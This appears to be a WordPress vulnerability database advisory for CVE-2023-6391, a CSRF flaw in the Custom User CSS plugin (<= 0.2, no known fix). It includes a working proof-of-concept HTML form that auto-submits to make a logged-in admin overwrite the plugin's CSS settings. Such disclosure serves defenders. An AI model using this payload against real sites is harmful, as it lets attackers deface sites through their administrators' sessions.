WordPress Plugin Vulnerabilities

Custom User CSS <= 0.2 - Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

Create an HTML form with the following content and make a logged in admin open it

<form action="https://example.com/wp-admin/themes.php?page=custom-user-css/custom_user_css.php" method="POST">
    <input type="text" name="custom_user_css_css" value="overwritten css, for example for defacement">
    <input type="text" name="action" value="update">
    <input type="text" name="page_options" value="custom_user_css_css">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

Plugin icon
custom-user-css
No known fix

References

CVE
CVE-2023-6391
URL
https://magos-securitas.com/txt/CVE-2023-6391.txt

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://magos-securitas.com
Verified
Yes
WPVDB ID
4098b18d-6ff3-462c-af05-48adb6599cf3

Timeline

Publicly Published
2024-01-03 (about 4 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-04 (about 4 months ago)

Other

Published
Title
Published
2022-01-05
Title
SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting
Published
2024-02-16
Title
Microsoft Clarity < 0.9.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting
Published
2024-03-25
Title
Simple Buttons Creator <= 1.04 - Aribtrary Button Deletion via CSRF
Published
2023-10-16
Title
WP Attachments <= 5.0.6 - Arbitrary Settings Update via CSRF
Published
2023-11-07
Title
Droit Dark Mode <= 1.1.2 - Cross-Site Request Forgery